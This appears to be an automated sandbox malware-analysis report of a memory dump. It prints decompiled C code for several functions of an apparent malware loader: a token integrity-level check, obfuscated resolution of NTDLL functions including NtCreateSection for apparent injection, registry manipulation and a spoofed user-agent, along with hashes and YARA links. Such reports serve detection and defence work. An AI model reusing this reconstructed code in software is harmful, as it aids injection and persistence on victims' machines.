Part of subcall function 04E9592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04E959B6
Part of subcall function 04E9592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04E959CC

memset.NTDLL ref: 04E98F0B

Part of subcall function 04E93C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04E98F24,73797325), ref: 04E93C59
Part of subcall function 04E93C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04E93C73

GetModuleHandleA.KERNEL32(4E52454B,05848CEF,73797325), ref: 04E98F41
GetProcAddress.KERNEL32(00000000), ref: 04E98F48
HeapFree.KERNEL32(00000000,00000000), ref: 04E98FB0

Part of subcall function 04E9A62D: GetProcAddress.KERNEL32(36776F57,04E9A2D4), ref: 04E9A648

CloseHandle.KERNEL32(00000000,00000001), ref: 04E98F8D
CloseHandle.KERNEL32(?), ref: 04E98F92
GetLastError.KERNEL32(00000001), ref: 04E98F96

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
String ID:
API String ID: 3075724336-0
Opcode ID: 70cdea0276dba444746d62a87900314eda646cc8a16f9b3bff53eabd85dc4ae1
Instruction ID: 3b5dd5be1511cbccf81cb45e4291534ee41a4e8ba1c87fb8a205b054a761b61a
Opcode Fuzzy Hash: 70cdea0276dba444746d62a87900314eda646cc8a16f9b3bff53eabd85dc4ae1
Instruction Fuzzy Hash: 76315EB2800218BFEF11AFA5CC88D9EBBFDEF08348F105466E605A31A0D735AD44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 04E91A08, Relevance: 10.6, APIs: 7, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E91A08(long* _a4) {
				long _v8;
				void* _v12;
				void _v16;
				long _v20;
				int _t33;
				void* _t46;

				_v16 = 1;
				_v20 = 0x2000;
				if( *0x4e9d25c > 5) {
					_v16 = 0;
					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
						_v8 = 0;
						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
						if(_v8 != 0) {
							_t46 = E04E9A71F(_v8);
							if(_t46 != 0) {
								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
								if(_t33 != 0) {
									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
								}
								E04E9A734(_t46);
							}
						}
						CloseHandle(_v12);
					}
				}
				 *_a4 = _v20;
				return _v16;
			}

0x04e91a15
0x04e91a1c
0x04e91a23
0x04e91a37
0x04e91a42
0x04e91a5a
0x04e91a67
0x04e91a6a
0x04e91a6f
0x04e91a7a
0x04e91a7e
0x04e91a8d
0x04e91a91
0x04e91aad
0x04e91aad
0x04e91ab1
0x04e91ab1
0x04e91ab6
0x04e91aba
0x04e91ac0
0x04e91ac1
0x04e91ac8
0x04e91ace

APIs

OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 04E91A3A
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 04E91A5A
GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 04E91A6A
CloseHandle.KERNEL32(00000000), ref: 04E91ABA

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 04E91A8D
GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 04E91A95
GetSidSubAuthority.ADVAPI32(00000000,?), ref: 04E91AA5

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
String ID:
API String ID: 1295030180-0
Opcode ID: 1e44bff2cbfa9c43b682344182e28efbb7ca4569a3c814fe9db3e26c497ecceb
Instruction ID: 997781f5138056412e925129948de6c7ce32743af9d566cfc966fb190f5c18be
Opcode Fuzzy Hash: 1e44bff2cbfa9c43b682344182e28efbb7ca4569a3c814fe9db3e26c497ecceb
Instruction Fuzzy Hash: A8215975900259FFEF00DFA1DC84EEEBBB9EF08305F1001A6E900A6290DB759E05EB60

Uniqueness

Uniqueness Score: -1.00%

Function 04E9391F, Relevance: 9.2, APIs: 6, Instructions: 154memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(?), ref: 04E9395A
IUnknown_QueryInterface_Proxy.RPCRT4(?,332C4425,?), ref: 04E939DD
StrStrIW.SHLWAPI(00000000,006E0069), ref: 04E93A1D
SysFreeString.OLEAUT32(00000000), ref: 04E93A3F

Part of subcall function 04E96F3A: SysAllocString.OLEAUT32(04E9C290), ref: 04E96F8A

SafeArrayDestroy.OLEAUT32(00000000), ref: 04E93A92
SysFreeString.OLEAUT32(00000000), ref: 04E93AA1

Part of subcall function 04E91AE2: Sleep.KERNELBASE(000001F4), ref: 04E91B2A

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: c390c574521727f49817b241eb7fbe2f09f77e4b18278c2fc6e21098d43c99cf
Instruction ID: c8c53b92be70a1279de5784c87f7345884e5536b0e48c6900dc91b587586f3e0
Opcode Fuzzy Hash: c390c574521727f49817b241eb7fbe2f09f77e4b18278c2fc6e21098d43c99cf
Instruction Fuzzy Hash: AD516C76900609BFDB01DFA9C844ADEB7B6FF88704F248429E945DB2A0EB75ED05CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04E96891, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 04E96096: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,058489D8,04E968BF,?,?,?,?,?,?,?,?,?,?,?,04E968BF), ref: 04E96163

Part of subcall function 04E96B75: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 04E96BB2
Part of subcall function 04E96B75: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 04E96BE3

SysAllocString.OLEAUT32(00000000), ref: 04E968EB
SysAllocString.OLEAUT32(0070006F), ref: 04E968FF
SysAllocString.OLEAUT32(00000000), ref: 04E96911
SysFreeString.OLEAUT32(00000000), ref: 04E96979
SysFreeString.OLEAUT32(00000000), ref: 04E96988
SysFreeString.OLEAUT32(00000000), ref: 04E96993

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
String ID:
API String ID: 2831207796-0
Opcode ID: c589fd481ef524c14e8f11e5482cecf48777f8654446bf0c7d190bde823fc9f6
Instruction ID: 62969f5f8c88c6fa7748f61b9ef2798ebd64c319f6bb20a60a6eb4916152ac9a
Opcode Fuzzy Hash: c589fd481ef524c14e8f11e5482cecf48777f8654446bf0c7d190bde823fc9f6
Instruction Fuzzy Hash: 3F414136900609AFDF01EFBDD844A9EB7F9EF49305F14442AE914EB2A0DA71ED05CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04E9592D, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E04E9592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04E9A71F(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4e9d2a8; // 0x9aa5a8
					_t1 = _t23 + 0x4e9e11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4e9d2a8; // 0x9aa5a8
					_t2 = _t26 + 0x4e9e769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04E9A734(_t54);
					} else {
						_t30 =  *0x4e9d2a8; // 0x9aa5a8
						_t5 = _t30 + 0x4e9e756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4e9d2a8; // 0x9aa5a8
							_t7 = _t33 + 0x4e9e40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4e9d2a8; // 0x9aa5a8
								_t9 = _t36 + 0x4e9e4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4e9d2a8; // 0x9aa5a8
									_t11 = _t39 + 0x4e9e779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04E96604(_t54, _a8); // executed
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

0x04e9593c
0x04e95940
0x04e95a02
0x04e95946
0x04e95946
0x04e9594b
0x04e9595e
0x04e95960
0x04e95965
0x04e9596d
0x04e95974
0x04e95976
0x04e9597b
0x04e959fa
0x04e959fb
0x04e9597d
0x04e9597d
0x04e95982
0x04e9598a
0x04e9598c
0x04e95991
0x00000000
0x04e95993
0x04e95993
0x04e95998
0x04e959a0
0x04e959a2
0x04e959a7
0x00000000
0x04e959a9
0x04e959a9
0x04e959ae
0x04e959b6
0x04e959b8
0x04e959bd
0x00000000
0x04e959bf
0x04e959bf
0x04e959c4
0x04e959cc
0x04e959ce
0x04e959d3
0x00000000
0x04e959d5
0x04e959db
0x04e959e0
0x04e959e7
0x04e959ec
0x04e959f1
0x00000000
0x04e959f3
0x04e959f6
0x04e959f6
0x04e959f1
0x04e959d3
0x04e959bd
0x04e959a7
0x04e95991
0x04e9597b
0x04e95a10

APIs

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04E98EBD,?,00000001,?,?,00000000,00000000), ref: 04E95952
GetProcAddress.KERNEL32(00000000,7243775A), ref: 04E95974
GetProcAddress.KERNEL32(00000000,614D775A), ref: 04E9598A
GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04E959A0
GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04E959B6
GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04E959CC

Part of subcall function 04E96604: NtCreateSection.NTDLL(?,000F001F,?,00000001,?,08000000,00000000,73B74EE0,00000000,00000000,04E959EC), ref: 04E96661
Part of subcall function 04E96604: memset.NTDLL ref: 04E96683

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
String ID:
API String ID: 3012371009-0
Opcode ID: 860eb4d9bc90c04a91fd7ea2d4f9c3d2f2e3262058e88a1d2545e0225bb0bd18
Instruction ID: aec843ed176e00296fafb2f97d45560eb402347066eade93d7d2e232fa029185
Opcode Fuzzy Hash: 860eb4d9bc90c04a91fd7ea2d4f9c3d2f2e3262058e88a1d2545e0225bb0bd18
Instruction Fuzzy Hash: 77215EB560070ABFEB11EF6ACC84D9AB7ECEF04304701952AE945C72D0EB74ED498B60

Uniqueness

Uniqueness Score: -1.00%

Function 04E9853F, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167
stringCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E04E9853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t59;
				intOrPtr* _t60;
				void* _t62;
				intOrPtr _t64;
				char _t65;
				void* _t67;
				intOrPtr _t68;
				intOrPtr _t69;
				intOrPtr _t71;
				void* _t73;
				signed int _t81;
				void* _t91;
				void* _t92;
				char _t98;
				signed int* _t100;
				intOrPtr* _t101;
				void* _t102;

				_t92 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t98 = _a16;
				if(_t98 == 0) {
					__imp__( &_v284,  *0x4e9d33c);
					_t91 = 0x80000002;
					L6:
					_t59 = E04E99070( &_v284,  &_v284);
					_a8 = _t59;
					if(_t59 == 0) {
						_v8 = 8;
						L29:
						_t60 = _a20;
						if(_t60 != 0) {
							 *_t60 =  *_t60 + 1;
						}
						return _v8;
					}
					_t101 = _a24;
					_t62 = E04E96E98(_t92, _t97, _t101, _t91, _t59); // executed
					if(_t62 != 0) {
						L27:
						E04E9A734(_a8);
						goto L29;
					}
					_t64 =  *0x4e9d278; // 0x5849a98
					_t16 = _t64 + 0xc; // 0x5849b66
					_t65 = E04E99070(_t64,  *_t16);
					_a24 = _t65;
					if(_t65 == 0) {
						L14:
						_t29 = _t101 + 0x14; // 0x102
						_t33 = _t101 + 0x10; // 0x3d04e9c0, executed
						_t67 = E04E922F1(_t97,  *_t33, _t91, _a8,  *0x4e9d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))); // executed
						if(_t67 == 0) {
							_t68 =  *0x4e9d2a8; // 0x9aa5a8
							if(_t98 == 0) {
								_t35 = _t68 + 0x4e9ea3f; // 0x4d4c4b48
								_t69 = _t35;
							} else {
								_t34 = _t68 + 0x4e9e8e7; // 0x55434b48
								_t69 = _t34;
							}
							if(E04E96C38(_t69,  *0x4e9d334,  *0x4e9d338,  &_a24,  &_a16) == 0) {
								if(_t98 == 0) {
									_t71 =  *0x4e9d2a8; // 0x9aa5a8
									_t44 = _t71 + 0x4e9e846; // 0x74666f53
									_t73 = E04E99070(_t44, _t44);
									_t99 = _t73;
									if(_t73 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t101 + 0x10; // 0x3d04e9c0
										E04E95D7D( *_t47, _t91, _a8,  *0x4e9d338, _a24);
										_t49 = _t101 + 0x10; // 0x3d04e9c0
										E04E95D7D( *_t49, _t91, _t99,  *0x4e9d330, _a16);
										E04E9A734(_t99);
									}
								} else {
									_t40 = _t101 + 0x10; // 0x3d04e9c0, executed
									E04E95D7D( *_t40, _t91, _a8,  *0x4e9d338, _a24); // executed
									_t43 = _t101 + 0x10; // 0x3d04e9c0
									E04E95D7D( *_t43, _t91, _a8,  *0x4e9d330, _a16);
								}
								if( *_t101 != 0) {
									E04E9A734(_a24);
								} else {
									 *_t101 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t101 + 0x10; // 0x3d04e9c0, executed
					_t81 = E04E98BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12); // executed
					if(_t81 == 0) {
						_t100 = _v16;
						if(_v12 == 0x28) {
							 *_t100 =  *_t100 & _t81;
							_t26 = _t101 + 0x10; // 0x3d04e9c0
							E04E922F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
						}
						E04E9A734(_t100);
						_t98 = _a16;
					}
					E04E9A734(_a24);
					goto L14;
				}
				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t97 = _a8;
					E04E9A749(_t98, _a8,  &_v284);
					__imp__(_t102 + _t98 - 0x117,  *0x4e9d33c);
					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
					_t91 = 0x80000003;
					goto L6;
				}
			}

0x04e9853f
0x04e98548
0x04e9854f
0x04e98554
0x04e985c1
0x04e985c7
0x04e985cc
0x04e985d3
0x04e985d8
0x04e985dd
0x04e98748
0x04e9874f
0x04e9874f
0x04e98754
0x04e98756
0x04e98756
0x04e9875f
0x04e9875f
0x04e985e3
0x04e985e8
0x04e985ef
0x04e9873e
0x04e98741
0x00000000
0x04e98741
0x04e985f5
0x04e985fa
0x04e985fd
0x04e98602
0x04e98607
0x04e98650
0x04e98650
0x04e98663
0x04e98666
0x04e9866d
0x04e98673
0x04e9867a
0x04e98684
0x04e98684
0x04e9867c
0x04e9867c
0x04e9867c
0x04e9867c
0x04e986a6
0x04e986ae
0x04e986dc
0x04e986e1
0x04e986e8
0x04e986ed
0x04e986f1
0x04e98723
0x04e986f3
0x04e98700
0x04e98703
0x04e98713
0x04e98716
0x04e9871c
0x04e9871c
0x04e986b0
0x04e986bd
0x04e986c0
0x04e986d2
0x04e986d5
0x04e986d5
0x04e9872d
0x04e98739
0x04e9872f
0x04e98732
0x04e98732
0x04e9872d
0x04e986a6
0x00000000
0x04e9866d
0x04e98616
0x04e98619
0x04e98620
0x04e98626
0x04e98629
0x04e9862b
0x04e98637
0x04e9863a
0x04e9863a
0x04e98640
0x04e98645
0x04e98645
0x04e9864b
0x00000000
0x04e9864b
0x04e98559
0x00000000
0x04e98580
0x04e98580
0x04e9858c
0x04e9859f
0x04e985a5
0x04e985ad
0x00000000
0x04e985ad

APIs

StrChrA.SHLWAPI(04E93741,0000005F,00000000,00000000,00000104), ref: 04E98572
lstrcpy.KERNEL32(?,?), ref: 04E9859F

Part of subcall function 04E99070: lstrlen.KERNEL32(?,00000000,05849A98,00000000,04E98808,05849C76,?,?,?,?,?,63699BC3,00000005,04E9D00C), ref: 04E99077
Part of subcall function 04E99070: mbstowcs.NTDLL ref: 04E990A0
Part of subcall function 04E99070: memset.NTDLL ref: 04E990B2

Part of subcall function 04E95D7D: lstrlenW.KERNEL32(?,?,?,04E98708,3D04E9C0,80000002,04E93741,04E9A513,74666F53,4D4C4B48,04E9A513,?,3D04E9C0,80000002,04E93741,?), ref: 04E95DA2

Part of subcall function 04E9A734: RtlFreeHeap.NTDLL(00000000,00000000,04E95637,00000000,?,?,00000000), ref: 04E9A740

lstrcpy.KERNEL32(?,00000000), ref: 04E985C1

Strings

\, xrefs: 04E985A5
(, xrefs: 04E98622

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
String ID: ($\
API String ID: 3924217599-1512714803
Opcode ID: b7868e3860fe2ee1ac6f72786dbf09a1b100f5ba878c81e0f3f1d62a510a4d59
Instruction ID: ce7dd93b67961a04d64dd60a8ff644f9c38cf63193a46375b17a646ed37cae6c
Opcode Fuzzy Hash: b7868e3860fe2ee1ac6f72786dbf09a1b100f5ba878c81e0f3f1d62a510a4d59
Instruction Fuzzy Hash: 82514976110209BFEF22AF61DD40EAA77FAFF05349F009519F911961A0EB39ED25EB10

Uniqueness

Uniqueness Score: -1.00%

Function 04E95BA2, Relevance: 7.7, APIs: 5, Instructions: 159
memoryCOMMON

Download Yara Rule

C-Code - Quality: 57%

			E04E95BA2(signed int __edx) {
				signed int _v8;
				long _v12;
				CHAR* _v16;
				long _v20;
				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				CHAR* _t54;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t62;
				CHAR* _t65;
				CHAR* _t66;
				char* _t67;
				void* _t68;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04E96C09();
				if(_t21 != 0) {
					_t59 =  *0x4e9d25c; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x4e9d25c = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x4e9d160(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04E9496B( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x4e9d2a8; // 0x9aa5a8
					if( *0x4e9d25c > 5) {
						_t8 = _t26 + 0x4e9e5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x4e9e9f5; // 0x44283a44
						_t27 = _t7;
					}
					E04E9729A(_t27, _t27);
					_t31 = E04E9232F(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t62 = 5;
					if(_t54 != _t62) {
						 *0x4e9d270 =  *0x4e9d270 ^ 0x81bbe65d;
						_t32 = E04E9A71F(0x60);
						 *0x4e9d32c = _t32;
						__eflags = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x4e9d32c; // 0x58495b0
							_t68 = _t68 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x4e9d32c; // 0x58495b0
							 *_t51 = 0x4e9e81a;
						}
						_t54 = 0;
						__eflags = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x4e9d238, 0, 0x43);
							 *0x4e9d2c8 = _t36;
							__eflags = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x4e9d25c; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x4e9d2a8; // 0x9aa5a8
								_t13 = _t58 + 0x4e9e55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4e9c287);
							}
							_t54 = 0;
							__eflags = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E04E99135( ~_v8 &  *0x4e9d270, 0x4e9d00c); // executed
								_t42 = E04E9888E(_t55); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04E987AE(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t65 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04E951B0(_t61, _t65, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t65;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04E91C66(__eflags,  &(_t65[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t66 = _v12;
						if(_t66 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x4e9d15c();
							}
							goto L34;
						}
						_t67 =  &(_t66[4]);
						do {
						} while (E04E9A273(_t62, _t67, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}

0x04e95ba2
0x04e95bad
0x04e95bb0
0x04e95bb3
0x04e95bb6
0x04e95bbd
0x04e95bbf
0x04e95bcb
0x04e95bcd
0x04e95bcd
0x04e95bd6
0x04e95bdc
0x04e95be1
0x04e95bfb
0x04e95c07
0x04e95c09
0x04e95c0e
0x04e95c18
0x04e95c18
0x04e95c10
0x04e95c10
0x04e95c10
0x04e95c10
0x04e95c1f
0x04e95c2c
0x04e95c33
0x04e95c38
0x04e95c38
0x04e95c40
0x04e95c43
0x04e95c69
0x04e95c75
0x04e95c7a
0x04e95c7f
0x04e95c81
0x04e95cad
0x04e95caf
0x04e95c83
0x04e95c87
0x04e95c8c
0x04e95c91
0x04e95c98
0x04e95c9e
0x04e95ca3
0x04e95ca9
0x04e95cb0
0x04e95cb2
0x04e95cb4
0x04e95cc3
0x04e95cc9
0x04e95cce
0x04e95cd0
0x04e95d00
0x04e95d02
0x04e95cd2
0x04e95cd2
0x04e95cd8
0x04e95ce5
0x04e95ceb
0x04e95ceb
0x04e95cf3
0x04e95cfc
0x04e95d03
0x04e95d05
0x04e95d07
0x04e95d0e
0x04e95d1b
0x04e95d20
0x04e95d25
0x04e95d27
0x04e95d29
0x00000000
0x00000000
0x04e95d2b
0x04e95d30
0x04e95d32
0x04e95d39
0x04e95d3d
0x04e95d40
0x04e95d55
0x04e95d59
0x04e95d5e
0x00000000
0x04e95d5e
0x04e95d42
0x04e95d44
0x00000000
0x00000000
0x04e95d4f
0x04e95d51
0x04e95d53
0x00000000
0x00000000
0x00000000
0x04e95d53
0x04e95d36
0x04e95d36
0x04e95d07
0x04e95c45
0x04e95c45
0x04e95c4a
0x04e95d60
0x04e95d64
0x04e95d6c
0x04e95d6c
0x00000000
0x04e95d64
0x04e95c50
0x04e95c53
0x04e95c5d
0x04e95c64
0x00000000
0x04e95d74
0x04e95d74
0x04e95d78
0x04e95d7c
0x04e95d7c

APIs

Part of subcall function 04E96C09: GetModuleHandleA.KERNEL32(4C44544E,00000000,04E95BBB,00000000,00000000), ref: 04E96C18

CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04E95C38

Part of subcall function 04E9A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04E95595), ref: 04E9A72B

memset.NTDLL ref: 04E95C87
RtlInitializeCriticalSection.NTDLL(05849570), ref: 04E95C98

Part of subcall function 04E91C66: memset.NTDLL ref: 04E91C7B
Part of subcall function 04E91C66: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04E91CBD
Part of subcall function 04E91C66: StrCmpNIW.SHLWAPI(00000000,00000000,00000000), ref: 04E91CC8

RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04E95CC3
wsprintfA.USER32 ref: 04E95CF3

Memory Dump Source

Source File: 00000007.00000002.937644139.0000000004E91000.00000020.00000001.sdmp, Offset: 04E90000, based on PE: true

Associated: 00000007.00000002.937611841.0000000004E90000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937677700.0000000004E9C000.00000002.00000001.sdmp Download File
Associated: 00000007.00000002.937708665.0000000004E9D000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.937737482.0000000004E9F000.00000002.00000001.sdmp Download File

Similarity

API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
String ID:
API String ID: 4246211962-0
Opcode ID: 3f11d69d8201fab50a3f26439c7f2e9e62de6aaf8d49818a73f1cfced64f5ef8
Instruction ID: 634a0bf937aec03603de689f3166588049433ebb46654361178a72e39cf98e5e
Opcode Fuzzy Hash: 3f11d69d8201fab50a3f26439c7f2e9e62de6aaf8d49818a73f1cfced64f5ef8
Instruction Fuzzy Hash: 5F510572A01224BBEF22EFA6DC48FAE73E8EB04709F085456E501D71C4EA74BD458B90

Uniqueness

Uniqueness Score: -1.00%

Function 04E962DA, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145
stringCOMMON

Download Yara Rule

C-Code - Quality: 22%

